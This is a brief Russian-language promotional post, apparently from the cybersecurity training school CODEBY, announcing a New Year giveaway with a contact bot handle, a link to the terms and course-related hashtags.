🥇 Для связи с менеджером @CodebyAcademyBot
🔗Ознакомиться с условиями розыгрыша здесь!
Не упустите свой шанс на новогодний подарок от CODEBY! Удачи!
#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity